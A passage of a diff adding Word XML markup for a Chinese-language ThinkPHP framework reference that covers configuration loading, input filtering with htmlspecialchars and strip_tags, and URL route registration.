+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">     </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return [</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>配置参数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>1'=&gt;'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>配置值</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>配置参数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>1'=&gt;'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>配置值</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">// ... </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>更多配置</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    ];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>如果</w:t>
+            </w:r>
+            <w:r>
+              <w:t>使用其他格式可以进行转换：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">     </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Config::parse(APP_PATH.'my_config.ini','ini');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="250" w:firstLine="525"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Config::parse(APP_PATH.'my_config.xml','xml');</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6441" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>读取</w:t>
+            </w:r>
+            <w:r>
+              <w:t>配置：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>echo Config::get('</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>配置参数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>1');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>echo C('</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>配置参数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>1');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>动态</w:t>
+            </w:r>
+            <w:r>
+              <w:t>配置</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Config::set('</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>配置参数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>','</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>配置值</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>C('</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>配置参数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>','</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>配置值</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>');</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6437" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>输入</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>变量检测：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>系统提供了</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>\think\Input</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>类来完成全局输入变量的检测、获取和安全过滤，支持包括</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>$_GET</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>、</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>$_POST</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>、</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>$_REQUEST</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>、</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>$_SERVER</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>、</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>$_SESSION</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>、</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>$_COOKIE</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>、</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>$_ENV</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>等系统变量，以及文件上传信息。</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>主要用于</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>检测和</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>安全</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>过滤：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>）全局静态配置</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">     </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'default_filter'=&gt; ['strip_tags','htmlspecialchars'],</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>）全局动态配置：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">     </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Input::$filters = ['strip_tags','htmlspecialchars'];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>获取</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>变量时过滤：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t xml:space="preserve">     </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Input::get('name','','htmlspecialchars'); // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>获取</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>get</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>变量</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>并用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>htmlspecialchars</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>函数过滤</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6441" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6441" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
         </w:tc>
       </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>路由</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>配置</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a4"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="6439"/>
+        <w:gridCol w:w="6440"/>
+        <w:gridCol w:w="6440"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6439" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>URL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>路由</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>模式</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>简化</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>URL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>访问地址，并根据定义的路由类型做出正确的解析</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>。首先</w:t>
+            </w:r>
+            <w:r>
+              <w:t>需要在</w:t>
+            </w:r>
+            <w:r>
+              <w:t>config.php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>中</w:t>
+            </w:r>
+            <w:r>
+              <w:t>进行配置：</w:t>
+            </w:r>
+          </w:p>
+          <w:tbl>
+            <w:tblPr>
+              <w:tblStyle w:val="a4"/>
+              <w:tblW w:w="0" w:type="auto"/>
+              <w:tblLayout w:type="fixed"/>
+              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+            </w:tblPr>
+            <w:tblGrid>
+              <w:gridCol w:w="3107"/>
+              <w:gridCol w:w="3108"/>
+            </w:tblGrid>
+            <w:tr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="3107" w:type="dxa"/>
+                </w:tcPr>
+                <w:p>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:hint="eastAsia"/>
+                    </w:rPr>
+                    <w:t>路由</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:t>和默认模式并存：</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                    <w:t>'url_route_on'  =&gt;  true,</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:r>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                    <w:t>'url_route_must'=&gt;  false,</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="3108" w:type="dxa"/>
+                </w:tcPr>
+                <w:p>
+                  <w:r>
+                    <w:rPr>
+                      <w:rFonts w:hint="eastAsia"/>
+                    </w:rPr>
+                    <w:t>只允许</w:t>
+                  </w:r>
+                  <w:r>
+                    <w:t>路由模式：</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:pPr>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                  </w:pPr>
+                  <w:r>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                    <w:t>'url_route_on'  =&gt;  true,</w:t>
+                  </w:r>
+                </w:p>
+                <w:p>
+                  <w:r>
+                    <w:rPr>
+                      <w:color w:val="0070C0"/>
+                    </w:rPr>
+                    <w:t>'url_route_must'=&gt;  true,</w:t>
+                  </w:r>
+                </w:p>
+              </w:tc>
+            </w:tr>
+          </w:tbl>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>注册路由规则</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）动态注册</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>：</w:t>
+            </w:r>
+            <w:r>
+              <w:t>方法类型有</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>get</w:t>
+            </w:r>
+            <w:r>
+              <w:t>,post,put,delete,*</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">     </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Route::register('new/:id','New/update','POST'); //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>注册</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>到</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>New</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>控制器的</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>update</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>操作，并且</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>以“</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>”开头的参数都表示动态变量，并且会自动对应一个</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>GET</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>参数</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）批量注册：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">     </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>\think\Route::register([</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="250" w:firstLine="525"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
